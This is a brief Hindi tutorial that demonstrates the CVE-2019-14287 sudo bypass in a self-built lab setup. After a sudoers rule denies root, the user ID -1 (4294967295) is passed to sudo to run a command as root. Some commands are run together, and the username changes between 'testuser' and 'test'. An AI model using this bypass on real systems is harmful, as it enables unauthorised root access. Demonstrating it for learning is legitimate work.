
CVE-2019-14287 sudo भेद्यता का चरण-दर-चरण प्रदर्शन जो प्रतिबंधित उपयोगकर्ताओं को निर्मित उपयोगकर्ता आईडी के माध्यम से रूट के रूप में कमांड निष्पादित करने की अनुमति देता है
4294967295 सुडो बग प्रतिबंधित उपयोगकर्ताओं को रूट के रूप में कमांड चलाने की अनुमति देता है
sudo su - root useradd -m -s /bin/bash testuser passwd testuser // पासवर्ड जोड़ें visudo
test ALL=(ALL, !root) /usr/bin/id // यह निर्दिष्ट करना कि यह उपयोगकर्ता रूट उपयोगकर्ता के साथ id कमांड का उपयोग नहीं कर सकता
फ़ाइल सहेजें और रूट उपयोगकर्ता से बाहर निकलें
sudo su - test
sudo id आपको संदेश दिखाई देगा: क्षमा करें, उपयोगकर्ता test को '/usr/bin/id' को रूट के रूप में निष्पादित करने की अनुमति नहीं है
sudo -u#-1 id या sudo -u#4294967295 id
और देखिए, आपने रूट का उपयोग करके id कमांड निष्पादित कर लिया है